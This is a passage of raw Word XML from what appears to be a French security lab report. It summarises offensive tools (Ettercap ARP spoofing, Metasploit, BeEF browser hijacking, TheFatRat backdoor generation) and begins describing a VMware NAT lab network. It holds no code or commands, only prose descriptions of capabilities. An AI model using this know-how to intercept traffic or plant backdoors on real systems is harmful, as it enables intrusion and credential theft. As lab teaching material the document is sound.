      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> Protocol) est un protocole utilisé pour résoudre les adresses MAC en adresses IP. En falsifiant les tables ARP, un attaquant peut intercepter et inspecter le trafic de l'utilisateur, modifier les paquets en transit et même injecter de nouveaux paquets. Cette technique permet également à un attaquant de détourner la communication entre deux hôtes en temps réel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549E9CA" w14:textId="27EA0E75" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Les fonctionnalités d'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> comprennent l'analyse de protocole, la capture de mot de passe, le filtrage des paquets, la redirection de session, l'injection de paquets, le déni de service, la détection de systèmes d'exploitation, l'analyse de vulnérabilités et la prise en charge de plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B98DC4" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431BDB40" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD657AF" w14:textId="48E60DD8" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="679ACAC3" wp14:editId="6CA3AC2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>74295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1432560" cy="1911133"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="96" name="Picture 96" descr="&quot;Metasploit&quot; T-shirt by Weeev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quot;Metasploit&quot; T-shirt by Weeev | Redbubb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2560" cy="1911133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Metasploit est une plateforme open-source de tests de pénétration qui permet aux professionnels de la sécurité de tester et d'évaluer les vulnérabilités des systèmes. Metasploit est largement utilisé pour réaliser des tests d'intrusion, des audits de sécurité et des évaluations de vulnérabilité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977954E" w14:textId="61F804A8" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve">La plateforme Metasploit offre des fonctionnalités avancées pour exploiter des vulnérabilités sur les systèmes cibles. Elle fournit également une grande variété d'outils pour la création de scripts personnalisés, de modules d'exploitation et de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>. Metasploit permet également aux utilisateurs d'automatiser les tests de sécurité et de créer des rapports détaillés sur les résultats des tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09089E6A" w14:textId="1E4B0312" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Metasploit comprend deux composants principaux : le Framework Metasploit et la Base de données Metasploit. Le Framework Metasploit est la partie principale de la plateforme qui fournit l'interface en ligne de commande et les outils pour les tests d'intrusion. La Base de données Metasploit est utilisée pour stocker les informations sur les cibles, les vulnérabilités et les résultats des tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F201A48" w14:textId="2AB1F338" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Metasploit est également livré avec une bibliothèque d'exploits et de modules d'exploitation préconstruits qui peuvent être utilisés pour tester les vulnérabilités courantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195A73CA" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6CEAF6" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D24DF1B" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DF4BBA" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60307B0E" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1281C1AF" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298DC92" w14:textId="221E6D5D" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CAA3164" wp14:editId="37E61D46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>73660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2600692" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="97" name="Picture 97" descr="Beef framework adding custom pages – HackingVision – Hacking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eef framework adding custom pages – HackingVision – HackingVis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0692" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Browser Exploitation Framework) est un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open-source pour tester la sécurité des navigateurs web et des applications web. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permet aux professionnels de la sécurité de tester la vulnérabilité des navigateurs web en exploitant les failles dans les technologies web telles que HTML5, Flash et JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30166544" w14:textId="362BFC1A" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est utilisé pour mener des attaques de type cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (XSS) en détournant le contrôle des navigateurs web vulnérables. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilise des techniques d'interception de session pour prendre le contrôle du navigateur web de la victime, puis utiliser cette session pour accéder à d'autres parties de leur système.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50130CAB" w14:textId="6637AE5A" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les fonctionnalités de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comprennent l'analyse de navigateur web, la capture de session, la manipulation de navigateur web, l'envoi de commandes à distance, la surveillance de l'activité en temps réel et la prise en charge de plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC987D" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEA51FF" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626B8CA" w14:textId="1057A00F" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12B21AC0" wp14:editId="47008D25">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>74930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2754669" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="98" name="Picture 98" descr="Compile malware with famous payloads for exploitation using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ompile malware with famous payloads for exploitation using th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4669" cy="1531620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est un outil open-source de génération de backdoors pour les systèmes Windows, Linux et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. L'outil permet aux professionnels de la sécurité de générer des backdoors avec des fonctionnalités avancées pour les tests d'intrusion, les audits de sécurité et les évaluations de vulnérabilité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76806A5F" w14:textId="4E5E07B7" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dispose d'un ensemble de fonctionnalités avancées qui permettent de générer des backdoors pour différents types d'attaques, telles que la récupération de mots de passe, l'exécution de commandes à distance et la collecte d'informations système. L'outil peut également être utilisé pour créer des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> personnalisés, ce qui permet aux professionnels de la sécurité de créer des backdoors sur mesure pour leurs besoins spécifiques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A14BE" w14:textId="377DAFBB" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est également livré avec une bibliothèque de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> préconstruits qui peuvent être utilisés pour tester les vulnérabilités courantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D4E9A" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C22A8FF" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3D1740" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7832F1D2" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BC3554" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3373F08D" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA37AAB" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8C1DC3" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744A28C5" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2CCC80" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BBB8F40" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D72CD2B" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B464D4" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD3CEB5" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6F27AD" w14:textId="21087A7A" w:rsidR="009D01D6" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc133586222"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00A0138A">
        <w:t xml:space="preserve">éseau </w:t>
      </w:r>
      <w:r w:rsidR="00DE5C2B">
        <w:t>du LAB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4B0F407C" w14:textId="7AD8544A" w:rsidR="00E90DEB" w:rsidRPr="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc133586223"/>
      <w:r>
        <w:t>Paramètre du réseau NAT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0B5EB8BC" w14:textId="4F6C5DB8" w:rsidR="00E90DEB" w:rsidRPr="00DE5C2B" w:rsidRDefault="00A0138A" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="223E6AAC" wp14:editId="41764B50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>69850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3478530" cy="3268980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>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8530" cy="3268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0DEB">
        <w:t xml:space="preserve">Notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E90DEB">
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> est </w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB" w:rsidRPr="0073101E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>virtualisé</w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB" w:rsidRPr="0073101E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VMWare</w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB" w:rsidRPr="0073101E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Workstation</w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB" w:rsidRPr="0073101E">
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> Pro dans un réseau </w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB" w:rsidRPr="0073101E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidR="00E90DEB">
        <w:t xml:space="preserve"> possédant les paramètres ci-contre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976A4E4" w14:textId="77777777" w:rsidR="00A0138A" w:rsidRDefault="00A0138A" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA6AA4D" w14:textId="311ABAD9" w:rsidR="00A0138A" w:rsidRDefault="00A0138A" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07D6C1BB" wp14:editId="70F8650D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2616200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2689860" cy="3058593"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>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9860" cy="3058593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A16F18" w14:textId="77777777" w:rsidR="00A0138A" w:rsidRDefault="00A0138A" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36469931" w14:textId="507725AC" w:rsidR="00A0138A" w:rsidRDefault="00A0138A" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E40D869" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4A2005" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BD8121" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7163783A" w14:textId="7295F2AB" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38345583" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BB7D88" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470A62FA" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F38FE07" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436032C4" w14:textId="014D0905" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B95DC3B" w14:textId="1ECC1351" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160DBAD5" wp14:editId="27C53DE5">
            <wp:extent cx="2754682" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>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8170" cy="2143931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="351485DE" w14:textId="08B0CE63" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4D6AB7" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
